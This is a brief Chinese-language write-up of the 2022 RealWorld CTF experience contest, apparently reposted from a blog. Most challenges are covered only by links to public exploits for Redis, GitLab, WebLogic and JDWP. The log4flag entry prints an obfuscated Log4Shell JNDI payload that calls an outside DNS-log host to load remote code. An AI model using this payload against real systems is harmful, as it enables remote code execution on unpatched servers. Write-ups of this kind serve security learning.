2022 RealWorld CTF体验赛Writeup

2022 RealWorld CTF体验赛Writeup,第1张

2022 RealWorld CTF体验赛Writeup

文章目录

Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote Debugger


Digital Souvenir


rwctf{RealWorldIsAwesome}
log4flag


有一些正则过滤

网上bypass方法很多,随便找一个就行

${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}


Refer:https://cloud.tencent.com/developer/article/1921530

Be-a-Database-Hacker


redis未授权访问

Refer: https://github.com/n0b0dyCN/redis-rogue-server


the Secrets of Memory



Refer:https://landgrey.me/blog/16/

baby flaglab


Refer:https://github.com/Al1ex/CVE-2021-22205

Flag Console


Refer:https://github.com/backlion/CVE-2020-14882_ALL

Be-a-Database-Hacker 2


Refer:https://blog.csdn.net/qq_36869808/article/details/122426922


Java Remote Debugger


Test.java

import java.lang.Thread;
public class Test {
  public static void main (String[] args) throws Exception{
    int i = 0;
    while (1 == 1) {
      Thread.sleep(1000);
      System.out.println("" + i);
      i += 1;
    }
  }
}

Java Debug Wire Protocol (JDWP) - Remote Code Execution

Refer:https://security.tencent.com/index.php/blog/msg/137


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zaji/5712383.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存